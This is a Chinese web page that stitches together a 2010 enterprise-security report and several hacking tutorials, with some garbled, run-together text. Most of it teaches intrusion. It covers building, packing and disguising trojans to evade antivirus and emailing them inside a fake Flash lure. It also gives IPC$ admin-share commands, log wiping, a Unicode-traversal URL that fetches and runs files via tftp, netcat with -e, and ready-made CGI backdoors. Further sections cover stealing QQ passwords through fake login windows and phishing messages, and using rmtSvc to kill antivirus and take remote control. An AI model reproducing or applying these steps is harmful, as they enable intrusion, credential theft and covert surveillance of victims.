科技网

当前位置: 首页 >智能

电脑被黑客入侵怎样办010年黑客攻陷25万网站9成国内企业曾被入侵

智能
来源: 作者: 2019-05-17 14:16:13

1 : 2010年黑客攻陷25万网站 9成国内企业曾被入侵

3月11日上午消息,信息安全厂商瑞星公司发布《2010中国企业安全报告》,报告指出2010年国内有250120个网站被植入了病毒或木马,9成国内企业曾被入侵,政府、军队、教育科研等机关单位已成为黑客攻击重要对象。

报告显示,2010年高达90%的传统企业内网(仅计算与互联网连通的企业网络)曾被成功侵入;几近百分之百的互联网公司都遇到过渗透测试、漏洞扫描、内网结构分析等安全事件,而有85%以上曾被黑客成功获得1定权限。

瑞星安全专家表示,2010年,以百度遭到域名劫持攻击为标志,所有中国的大型公司和网站都遭到了严重的安全要挟。DDOS攻击、病毒植入、域名劫持、机密信息丢失、管理权限外泄等成为企业最易遭受的黑客攻击。

而在被攻击对象方面,软件系统不再是唯1选择,手机、U盘、移动硬盘、基础设施等都已成为黑客的攻击目标或跳板,企业急需量身定制全面、系统的整体安全解决方案。

科研机构等成为黑客攻击重要对象

瑞星报告指出,在所有受攻击的企业和单位中,国家机关、涉密单位、科研院校、金融单位等触及国家机密和资金安全的,遭到黑客攻击的技术含量和攻击频率远高于普通企业。乃至有涉密单位在1个月以内就遭到多个不同组织的近千次攻击窥伺。

而与涉密单位相干的个人电脑、手机、U盘等私人物品,也常常会成为黑客攻击的突破口。例如,有些承当军队研究任务的院校,其研究人员的个人电脑也常常遭到攻击,攻击者企图通过对U盘、移动硬盘、手机的攻击,将其作为跳板,进而攻击涉密网络,1旦成功则会造成机密资料外泄的严重后果。

根据瑞星的估算,仅仅在2010年,针对这些涉密网络的攻击就高达10万次以上,其中90%的攻击IP地址来自国外,而美国、日本、韩国是排行最前的3个攻击来源地。

9成企业曾被成功侵入

瑞星安全报告指出,高达90%的企业内网(仅计算与互联网连通的企业网络)被成功侵入过最少1次。其中遇到歹意代码(病毒和木马等)侵入的比例占50%,黑客攻击和渗透占43%,钓渔网站攻击和其它情势安全事件占7%。

与此同时,国内企业的恶性竞争已延伸到了黑客领域。在瑞星专家抽样检查的100家企业中,有近20%感染了非常复杂的木马程序,这些木马会定时把企业资料传送给企业的竞争者,使其在新产品发布、市场计划、广告发布等领域失去先机。同时,国内也出现了针对竞争对手编写歹意程序的案例,有的企业专门在竞争对手的客户中散布这类程序,使其产品运行异常,利用这类手段来抢夺其市场份额。

瑞星报告罗列并详细分析了企业遭攻击的7种常见类型:阻断用户访问、在网站植入病毒和木马、将域名劫持到歹意网站、内部账号和密码外泄、内网关键信息外泄、商业机密外泄、关键业务受影响等。

2010年,国内有250120个网站被植入了病毒或木马(以域名计算)。教育科研网站、网游相干网站和政府网站,是最容易被攻击植入木马的3个领域,分别占整体数量的27%、17%和13%。

针对企业信息安全的保护,瑞星报告指出,需要从企业本身建设和安全产品两方面共同着力。

2 : 看看黑客是怎样入侵你的电脑

相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松到达攻击的目的。今天,笔者就以最新的1款木马程序——黑洞2004,从种植、使用、隐藏、防范4个方面来为网络爱好者介绍1下木马的特性。需要提示大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,由于杀毒软件会把木马作为病毒的1种进行查杀。

操作步骤:

1、种植木马

现在网络上流行的木马基本上都采取的是C/S 结构(客户端/服务端)。你要使用木马控制对方的电脑,首先需要在对方的的电脑中种植并运行服务端程序,然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。

2、使用木马

成功的给他人植入木马服务端后,就需要耐心等待服务端上线。由于黑洞2004采取了反连接技术,所以服务端上线后会自动和客户端进行连接,这时候,我们就能够操控客户端对服务端进行远程控制。在黑洞2004下面的列表中,随意选择1台已上线的电脑,然后通过上面的命令按钮就能够对这台电脑进行控制。下面就简单的介绍1下这些命令的意义。

文件管理:服务端上线以后,你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹,并且支持断点传输。简单吧?

进程管理:查看、刷新、关闭对方的进程,如果发现有杀毒软件或防火墙,就能够关闭相应的进程,到达保护服务器端程序的目的。

窗口管理:管理服务端电脑的程序窗口,你可使对方窗口中的程序最大化、最小化、正常关闭等操作,这样就比进程管理更灵活。你可以弄很多恶作剧,比如让对方的某个窗口不停的最大化和最小化。

视频监控和语音监听:如果远程服务端电脑安装有USB摄像头,那末可以通过它来获得图象,并可直接保存为Media Play可以直接播放的Mpeg文件;需要对方有麦克风的话,还可以听到他们的谈话,恐怖吧?

除上面介绍的这些功能之外,还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能,操作都非常简单,明白了吧?做骇客其实很容易。

3 隐藏

随着杀毒软件病毒库的升级,木马会很快被杀毒软件查杀,所以为了使木马服务端辟开杀毒软件的查杀,长时间的隐藏在他人的电脑中,在木马为黑客提供几种可行的办法。

1.木马的本身保护

就像前面提到的,黑洞2004在生成服务真个时候,用户可以更换图标,并使用软件UPX对服务端自动进行紧缩隐藏。

2.捆绑服务端

用户通过使用文件捆绑器把木马服务端和正常的文件捆绑在1起,到达欺骗对方的目的。文件捆绑器有广外文件捆绑器2002、万能文件捆绑器、exeBinder、Exe Bundle等。

3.制做自己的服务端

上面提到的这些方法虽然能1时瞒过杀毒软件,但终究还是不能逃脱杀毒软件的查杀,所以若能对现有的木马进行假装,让杀毒软件没法辨别,则是个治本的方法。可以通过使用紧缩EXE和DLL文件的紧缩软件对服务端进行加壳保护。例如1中的UPX就是这样1款紧缩软件,但默许该软件是依照本身的设置对服务端紧缩的,因此得出的结果都相同,很难长时间躲过杀毒软件;而自己对服务端进行紧缩,就能够选择不同的选项,紧缩出与众不同的服务端来,使杀毒软件很难判断。下面我就以冰河为例,为大家简单的讲授1下脱壳(解压)、加壳(紧缩)的进程。

如果我们用杀毒软件对冰河进行查杀,1定会发现2个病毒,1个是冰河的客户端,另外一个是服务端。使用软件“PEiD”查看软件的服务端是不是已被作者加壳,可以看到服务端已使用UPX进行了紧缩。

现在,我们就需要对软件进行脱壳,也就是1种解压的进程。这里我使用了“UPXUnpack”,选择需要的文件后,点击“解紧缩”就开始履行脱壳。

脱壳完成后,我们需要为服务端加1个新

壳,加壳的软件很多,比如:ASPack、ASProtect、UPXShell、Petite等。这里以“ASPack”为例,点击“打开”按钮,选择刚刚脱壳的服务端程序,选择完成后ASPack会自动为服务端进行加壳。再次用杀毒软件对这个服务端进行查杀,发现其已不能辨认判断了。如果你的杀毒软件照旧可以查杀,你还可使用多个软件对服务端进行屡次加壳。笔者在使用Petite和ASPack对服务端进行2次加壳后,试用了多种杀毒软件都没有扫描出来。现在网络中流行的很多XX版冰河,就是网友通过对服务端进行修改并重新加壳后制做出来的。

为了不不熟习木马的用户误运行服务端,现在流行的木马都没有提供单独的服务端程序,而是通过用户自己设置来生成服务端,黑洞2004也是这样。首先运行黑洞2004,点击“功能/生成服务端”命令,弹出“服务端配置”界面。由于黑洞2004采取了反弹技术(请参加小知识),首先单击旁边的“查看”按钮,在弹出的窗口中设置新的域名,输入你事前申请空间的域名和密码,单击“域名注册”,在下面的窗口中会反应出注册的情况。域名注册成功以后,返回“服务端配置”界面,填入刚刚申请的域名,和“上线显示名称”、“注册表启动名称”等项目。为了迷惑他人,可以点“更改服务端图标”按钮为服务端选择1个图标。所有的设置都完成后,点击“生成EXE型服务端”就生成了1个服务端。在生成服务真个同时,软件会自动使用UPX为服务端进行紧缩,对服务端起到隐藏保护的作用。

服务端生成以后,下1步要做的是将服务端植入他人的电脑?常见的方法有,通过系统或软件的漏洞入侵他人的电脑把木马的服务端植入其的电脑;或通过Email夹带,把服务端作为附件寄给对方;和把服务端进行假装后放到自己的同享文件夹,通过P2P软件(比如PP点点通、百宝等),让网友在毫无防范中下载并运行服务端程序。

由于本文主要面对普通的网络爱好者,所以就使用较为简单的Email夹带,为大家进行讲授。我们使用大家常常会看到的Flash动画为例,建立1个文件夹命名为“好看的动画”,在该文件夹里边再建立文件夹“动画.files”,将木马服务端软件放到该文件夹中假定名称为“abc.exe”,再在该文件夹内建立flash文件,在flash文件的第1帧输入文字“您的播放插件不全,单击下边的按钮,再单击打开按钮安装插件”,新建1个按钮组件,将其拖到舞台中,打开动作面板,在里边输入“on (press) ”,表示当单击该按钮时履行abc这个文件。在文件夹“好看的动画”中新建1个网页文件命名为“动画.htm”,将刚才制作的动画放到该网页中。看出门道了吗?平常你下载的网站通常就是1个.html文件和1个结尾为.files的文件夹,我们这么构造的缘由也是用来迷惑打开者,毕竟没有几个人会去翻.files文件夹。现在我们就能够撰写1封新邮件了,将文件夹“好看的动画”紧缩成1个文件,放到邮件的附件中,再编写1个诱人的主题。只要对方坚信不疑的运行它,并重新启动系统,服务端就种植成功了。

3、防范

防范重于医治,在我们的电脑还没有中木马前,我们需要做很多必要的工作,比如:安装杀毒软件和网络防火墙;及时更新病毒库和系统的安全补钉;定时备份硬盘上的文件;不要运行来路不明的软件和打开来路不明的邮件。

最后笔者要特别提示大家,木马除具有强大的远程控制功能外,还包括极强的破坏性。我们学习它,只是为了了解它的技术与方法,而不是用于偷盗密码等破坏行动,希望大家好自为之。

小知识:

反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的困难。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的1个文件,并打开端口监听,等待服务真个连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让自己开始连接时,就主动连接,如此便可完成连接工作。

因此在互联网上可以访问到局域网里通过 NAT (透明朝理)代理上网的电脑,并且可以穿过防火墙。与传统的远程控制软件相反,反弹端口型软件的服务端会主动连接客户端,客户真个监听端口1般开为80(即用于网页阅读的端口),这样,即便用户在命令提示符下使用“netstat -a”命令检查自己的端口,发现的也是类似“TCP UserIP:3015 ControllerIP:http ESTABLISHED”的情况,略微忽视1点你就会以为是自己在阅读网页,而防火墙也会一样这么认为的。因而,与1般的软件相反,反弹端口型软件的服务端主动连接客户端,这样就能够轻易的突破防火墙的限制。最后推荐个非常安全好用的程序给大家 看了再说吧,我觉得好用不知道大家觉得如何,呵呵!

您已欣赏本作品           馆感谢光临3 : 95黑客技术之知道对方IP入侵他人电脑黑客

文章并不是原创实在找不到文章的来源了,所以就不把原创作者给发上来了,希望作者体谅。与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator"传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$查看远程主机时间 net time \IP地址定时启动某个程序 at \IP地址 02:18 readme.exe查看同享 net view \IP地址查看netbios工作组列表 nBTstat -A IP地址将远程主机C盘映照为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"这两条把自己增加到管理员组: net user 用户名 密码 /addnet locaLGroup Administrators 用户名 /add断开连接 net use \IP地址ipc$ /delete扫尾:del C:winntsystem32logfiles*.*del C:winntssytem32config*.evtdel C:winntsystem32dTCLog*.*del C:winntsystem32*.logdel C:winntsystem32*.txtdel C:winnt*.txtdel C:winnt*.log1、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc /list \IP地址netsvc schedule \IP地址 /querynetsvc \IP地址 schedule /start2、OpenTelnet.exe远程启动主机的Telnet服务,并绑定端口到7878,例如:OpenTelnet \IP地址 用户名 密码 1 7878然后就能够telnet到主机的7878端口,进入DOS方式下:telnet IP地址 78783、winshell.exe1个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:p Path (查看winshell主程序的路径信息)b reBoot (重新启动机器)d shutDown (关闭机器)s Shell (履行后你就会看到可爱的“C:>”)x eXit (退出本次登录会话,此命令其实不终止winshell的运行)CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)4、3389登陆器,GUI方式登录远程主机的5、elsave.exe事件日志清除工具elsave -s \IP地址 -l "application" -Celsave -s \IP地址 -l "system" -Celsave -s \IP地址 -l "security" -C履行后成功清除利用程序日志,系统日志,安全日志6、hbulot.exe开启win2kserver和winxp的3389服务hbulot (/r)7、nc.exe(netcat.exe)1个很好的工具,1些脚本程序都要用到它,也可做溢出后的连接用。想要连接到某处: nc (-options) hostname port(s)(ports) ...绑定端口等待连接: nc -l -p port (-options) (hostname) (port)参数:-e prog 程序重定向,1旦连接,就履行 (危险!)-g gateway source-routing hop point(s), up to 8-G num source-routing pointer: 4, 8, 12, ...-h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u UDP模式-v 详细输出——用两个-v可得到更详细的内容-w secs timeout的时间-z 将输入输出关掉——用于扫描时8、TFTPD32.EXE把自己的电脑临时变成1台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上履行,通常要利用Unicode漏洞或telnet到肉鸡,例如:http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名然后可以直接令文件运行:http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名9、prihack.exe是IIS的printer远程缓冲区溢出工具idqover.exe是溢出idq的,选择“溢出后在1个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,1连它的端口,绑定的命令马上履行。xploit.exe是1个图形界面的ida溢出,成功以后winxp下需要打winxp。1○、ntis.exe、cmd.exe和cmdasp.asp是3个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP履行权限的目录。然后用IE阅读器连接.“远程破解”与“本地破解”正好相反,是指QQ盗号者通过网络偷盗远端QQ用户的密码。这类QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息欺骗和五花八门的QQ木马病毒等。下面就让我们1同来看看这些QQ密码的远程破解是怎样实现的。1、在线密码破解大家知道QQ可以利用代理服务器登录,这是1种保护措施。它不但可以隐藏用户的真实IP地址,以免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。在线密码破解和本地密码破解采取的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,便可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码!在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它依然采取穷举法技术,所以在枚举密钥位数长度和类型时,校验时间很长,破解效力不高。一样,这类方法还遭到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。目前功能比较强大的1款QQ密码在线破解软件叫QQExplorer。它的破解操作分4步:第1步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第2步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻觅QQ代理服务器麻烦,可使用1些现代的QQ代理公布软件);第3步,点击“添加&测试”按钮,软件先自动检测此服务器是不是正常,肯定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动挑选不可用或速度慢的服务器);第4步,点击“开始”按钮,开始在线密码破解……2、登录窗口破解捏造QQ登录窗口的盗号方法非常简单,这是1种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成1个假装的QQ主程序,它运行后会出现跟腾讯QQ1模1样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以1款叫“狐Q”的软件为例,首次运行它时,它会把本身复制到QQ目录中,并把原来的QQ.exe文件改名为QQ.com(这样的更改不会影响QQ的正常运行)。设置终了后,“狐Q”的原程序就会消失,假装成QQ等待“猎物”上钩……在其软件设置中,有1项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那末用户第1次运行的是真QQ了,也就是说在第3次运行时,用户的QQ号便被盗了!在QQ密码发送的进程中,如果发送失败,它还会把QQ号和密码记下来,等待下1次发送。即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几近可以捕获Windows下所有标准密码框中的密码,如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后,它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”,它几近可以捕获Windows 9x/2000/XP下所有登录窗口中的密码,并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时,只须填上用于接收他人QQ密码的邮箱地址及保护密码,并把生成的盗号器文件传过去哄骗他人运行,然后就能够坐等密码上门!此软件与传统的键盘记录器不同,它在电脑每次开机时隐藏自启动,不管密码是用键盘输入的,还是复制、粘贴的,都能够有效地实时拦截!其注册版本竟然还带有自动升级的功能,破坏力10分巨大。3、邮箱破解利用邮箱盗取QQ密码也是1种比较经常使用的方法。我们都知道,腾讯公司在对用户的QQ号码进行验证时需要用户填写电子邮箱。对申请了“密码保护”功能的用户,在腾讯主页上找回遗忘的密码时,密码会被发送到用户注册时的邮箱中。所以,只要盗号者破解了对方的电子邮箱,就有机会得到其QQ密码!通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱,具体的操作方法有多种,由于它有点超越文本的范畴,所以大家可以自己上网查询相干资料,在此就不赘述了。4、消息欺骗孔子曰:上士杀人用笔端,中士杀人用语言,下士杀人用石盘。远程盗取QQ密码还有1种大家最多见也是最简单最有效的方法,那就是利用很多人爱贪小便宜的弱点,进行人为的欺骗!标题:腾讯关于xxxxx获奖通知“QQ荣幸儿:恭喜!!!您已成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件,并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注:奖品是以邮寄方式寄出,请您认真填写以下资料。如果填写毛病,将被作为自动放弃获奖机会处理。> > QQ号码:> 密码:> 姓名:> E-mail地址:> 身份证号码:> 通讯地址:> 联系电话:> 邮编:”比如我们的QQ常常会收到以下的陌生人消息。如果你真的照实填写这些资料并傻傻的发送回去,不1会儿QQ密码就被盗了。还有类似这样的消息:“亲爱的***号QQ用户,恭喜你你已成为腾讯的荣幸号码,腾讯公司送你QQ靓号:12345,密码:54321。请尽快登陆并修改密码,感谢您对腾讯公司的支持!”很多人1看,以为白捡的便宜来了 ,登录1试还是真的,因而就大大咧咧地笑纳了。但是,很多人为了方便,不管甚么东西都爱使用相同的密码,所以当这个QQ号的密码被你改成与自己QQ号相同的密码时,自己QQ号的连同这个赠送的QQ号都得玩完!这是由于,赠送的QQ号已被盗号者申请过密码保护,当你更改密码后他就利用腾讯的密码保护功能把它收了回去,同时也收走你的QQ密码。如果你的QQ没有申请过密码保护,此刻就只能和它永别了。5、更多的木马破解“古希腊大军围攻特洛伊城,久攻不破,遂造1大木马藏匿将士于其中,大部队伪装撤退而弃木马。城中得知敌退,将木马作战利品拖入城内。午夜时分,匿于木马中的将士开启城门4处纵火,城外伏兵涌入,里应外合,焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事,其中那只木马被黑客程序借用其名,表“1经潜入,后患无穷”之意。1个完全的木马程序由服务器端和控制端组成。所谓“中了木马”,是指用户的电脑中被安装了木马的服务器端,而具有控制真个盗号者就通过网络远程控制该电脑,从而轻而易举地盗得该缒灾械腝Q密码。针对QQ的木马程序多不胜数,其中专门盗取QQ密码的也有1大堆,它们被偷偷地安装在用户的电脑中,随电脑启动而自动运行,如果用户使用QQ,那末其账号和密码就会被这些木马记录下来,并发送到木马安装者的邮箱中。前面已介绍了两款通过登录窗口盗号的QQ木马,下面再介绍两款典型的。第1款:极品QQ盗号2004这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多,先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题,然后把生成的盗号器偷偷地安装到他人的电脑里……这个木马宣称可以避过主流的杀毒软件,盗取QQ最新版本的密码,即QQ2004和QQ2004奥运特别版的密码。第2款:QQ特务3.0使用此木马软件时,点击工具条上的“服务端”,依照提示生成服务端程序,然后把它偷偷地传到他人的电脑中,当受害者不谨慎运行了它,木马就被种上了。这个木马不但可以盗号,还能悄悄地在后台记录受害者的QQ聊天信息,并下载可履行文件实现远程升级和远程履行脚本程序。另外再注册以后,它还可以直接远程监控对方电脑上的QQ聊天记录。利用木马软件盗取QQ密码,明显比用前面介绍的那些破解方法更有效力!不但节省时间,而且成功率也高。但是,如何把木马程序的服务器端安装在用户的电脑中,这是1个费心思的事儿。另外,很多功能强大的木马程序都是需要花钱注册,才能使用其全部功能。因此,对那些水平良莠不齐的盗号者而言,要想玩转木马程序,还得费点劲。听说过灰鸽子、冰河等可以实现远程控制,但你听说过IE也能够实现吗?不错,1款基于IE的新鲜工具——rmtSvc&vIDC便可让微软的IE成为1个超级黑客爪牙。本文除将为你展现rmtSvc&vIDC是如何基于IE远程控制肉鸡之外,更在如何“暗杀”杀毒软件、攻击思路上有较强的指点性。如果我问你IE能做甚么?你的答案绝对不完全!IE可不单单能阅读网页。如果我再告知你IE还能用来远程控制、远程传输、进程管理、代理服务,乃至远程开启Telnet、FTP服务等等呢?你1定觉得不可思议吧,有了rmtSvc&vIDC,这1切皆有可能!1、有IE 想黑就黑简单点说,rmtSvc是1款集FTP、Telnet服务、Proxy服务和vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采取B/S结构(无需安装),用户可通过阅读器进行远程控制(我们的口号是:有IE,想黑就黑!)。下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc经常使用功能的使95黑客技术之知道对方IP入侵他人电脑黑客_知道ip怎样入侵

用方法及技能。解压下载后的紧缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到杀毒软件的查杀),笔者先告知大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。运行该软件,进入“选项”菜单,勾选“保存额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动紧缩了。特别提示:紧缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进1步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》1文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进1步讨论了。2、武装RmtSvc “暗杀”杀毒软件1.打开阅读器输入http://IP:port(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默许为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默许为123456),就能够进行rmtSvc所支持的操作(如果之前已连同msnlib.dll和webe目录都发给了对方,那末rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。2.欢迎登录画面的上方为rmtSvc的系统菜单,从左至右的功能顺次为:Pview (进程查看)、Spy++(远程控制管理)、Proxy(启动或停止rmtSvc的代理服务)、vIDC(设置vIDCs的访问权限)、logoff(注销对rmtSvc登录)、Option(配置rmtSvc的运行参数)、About(rmtsvc欢迎/登录画面)。3.第1次登录需进入rmtSvc的参数设置更改敏感信息(图2),这样才能保障其安全性。先在“Modify Password”修改rmtSvc访问密码,再在“Service Port”更改rmtSvc服务端口为任意1个4位不经常使用的端口(需要重启服务才会生效,建议设为高端端口)。然后将“Start Control、Stolen mode”选上,这样rmtSvc会自动安装为Windows服务随机启动且服务为隐藏属性,这也就意味着在下次启动时,你可以继续控制目标机器。4.接下来在“Start mode”选项中,设置rmtSvc运行后自动启动FTP和Telnet服务(另外还有Proxy、vIDCs映照等)。通过FTP可以方便地进行文件上传下载。再将“Auto install service”和“Forbid detaching Dll”选择上,这样每次程序运行时会自动检测rmtSvc服务是不是已安装,如果没有安装则自动安装为服务(相当于自我修复功能)并释放1个DLL文件(可修改文件名,默许为inject.dll),这是为了避免自动释放的未加壳的DLL被杀毒软件查杀,用户可以选择不释放DLL。手工将加壳后的DLL拷入到被控机的系统目录下,在释放DLL的名称处填入你加壳后的DLL名称。高手传经:rmtSvc释放的DLL主要有以下用途:隐藏进程、摹拟“Ctrl+Alt+D+Del”按键、显示密码框密码、监视rmtSvc运行情况。如果异常退出或被杀掉则会自动重新启动,将配置参数写入rmtSvc程序本身(强烈建议选择)。5.接下来在“Killed Program”中,设定rmtSvc监视并自动杀掉的进程名称,如有多个进程,各个名称之间以逗号分隔。例如输入:PFW.exe,KAVSvc.exe就能够把金山毒霸和天网防火墙关闭。6.1切设置无误后,点击“Save”保存当前配置,在弹出的对话框中输入reg,将配置参数写入到注册表。输入self则是将配置参数写入该EXE文件本身,如果填写其它则会生成相应文件名的.exe的副本,并将配置参数写入此EXE副本。例如:输入c:\abc.exe,将在c盘根目录下生成1个abc.exe副本,并将配置参数写入此副本。7.随后rmtSvc服务会重新启动运行。高手传经:隐藏模式下才可以将配置参数写入EXE本身,如果没有保存,每次在rmtSvc正常退出时也会将配置参数写入EXE本身。8.再次使用新设密码登录后,单击Pview进入“进程查看”页面,在这里将显示3个部份的信息:系统信息、进程/模块信息、CPU/内存使用信息。在页面的右侧为进程模块显示区域,点击某个进程名则显示此进程的相干模块信息,点击“Kill It”按钮就能够杀掉该进程(需要注意的是进程列表不会实时自动刷新,用户必须手工刷新)。现在你的rmtSvc已被武装到了牙齿,还等甚么,可以出手了。3、用IE控制过把瘾把挡路的安全软件给“暗杀”后,接下来就能够趁对方不在时使用Spy++远程控制管理来远程控制机器了。固然在控制前我们需要将相干参数设置妥当,这样才能得到更好的控制效果。1.在“Quality”显示效果当选择Good(好),“Stretch”设置捕获图象的缩小比率80%。最后将“Cursor”选上,这样在捕获远程计算机屏幕时就会连同鼠标光标1起捕捉,以便用户知道当前鼠标光标位置。设置好后点击“Set”使上述3个参数生效。2.接下来就能够尝试控制了。当远程桌面图象处于焦点状态(鼠标在图象区域内),你就能够直接敲击键盘发送按键信息,和你操作本地机器1样。但是对输入大段的文本这是非常不方便的,由于你的每次按键动作都会作为1次HTTP要求发出,输入速度很慢。如果你想输入大段文本,可以将鼠标选中Input输入框,然后输入你想要发送的文本,按下回车便可;如果选中了Crlf复选框,则在你输入的文本后面会自动加入回车换行。3.但是在进行远程计算机登录时,有些机器可能没法通过Input输入框直接输入登录密码,只能通过摹拟键盘输入登录密码。方法以下:通过鼠标直接点击桌面图象,系统会自动辨认你的鼠标的单击、双击键信息。如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键,系统也能自动辨认。4.为了更方便地控制远程桌面,可以将远程桌面图象设为自动刷新,这样就不会出现有动作发出而图象没有变化需要手工刷新的情况了。方法以下,勾选“Auto-refresh”项,在右侧输入自动刷新间隔,默许为500ms。高手传经:如果想知道远程被控机中密码框中的密码。则需要用到Password→Text项,在有密码框时此项会变成Text→Password。此时只要用鼠标左键点击远程桌面图象的密码输入框,则远程被控机密码框中的密码会被翻译成明文显示。如果你取消此项功能,点击Text→Password项便可,此时此项就会变成Password→Text。5.如果要远程履行程序,选择Start下拉列表框的Run项,输入你要远程履行的文件名和参数便可,使用方法和Windows的开始菜单的运行命令1致。如此这般,通过IE就可以像操作本机1样控制目标机了。4、FTP/Telnet 1个都不能少远程控制仿佛其实不能让我们感到满足,那就再来开启对方的FTP/Telnet服务,完全过把入侵瘾吧。1.进入“FTP&Telnet”菜单,点击FTP/Telnet服务旁边的“Run”就能够启动相干服务了。FTP/Telnet port:设置FTP/Telnet服务的端口,默许FTP为2121,Telnet为2323。Anonymous access:设置访问FTP服务的权限,是不是允许匿名访问(enable),如果不允许则设置访问的用户名和密码。2.另外,我们还要允许设置不同访问的账号,每一个账号可以指定是不是可写/可删除/可履行和设置不同的FTP根目录。可以在FTP设置的文本输入框中输入多个访问账号信息,各个账号信息用回车换行分隔,账号信息格式以下:[账号名] SP [密码] SP [访问权限] SP [允许访问的目录] CRLF高手传经:设置PERMISSION(访问权限)时,0:仅仅只读,1:可写,3:可写并且可删除 7:可写可删除可履行。例如:[cytkk] sp [123456] sp [7] sp [c:] 就建立了1个具有管理员权限,密码为123456的cytkk账户。3.此时FTP账号信息仅仅写入注册表保存,不会保存到EXE中。现在就能够利用FTP工具和Windows自带的Telnet工具进行登录和操作了,此时你想怎样玩就怎样玩吧!到此,RmtSvc基本功能的使用大家就已学会了,限于篇幅,它更多的功能就不在此逐一举例了。黑客已成为1种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿他人开玩笑,弄些恶作剧。其实黑客的最高境地在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要晓得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍1种WIN9X下的入侵方法:1.获得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反应的信息既是对方的上网地点。3.得到对方的电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第1行是对方电脑名称 第2行是对方电脑所在工作组 第3行是对方电脑的说明。4.在Windows目录下有1文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件:XX.XX.XX.XX 电脑名。5.开DOS窗口键入 NBTSTAT -R。6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击便可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址.4 : 黑客技术之知道对方IP入侵他人电脑黑客

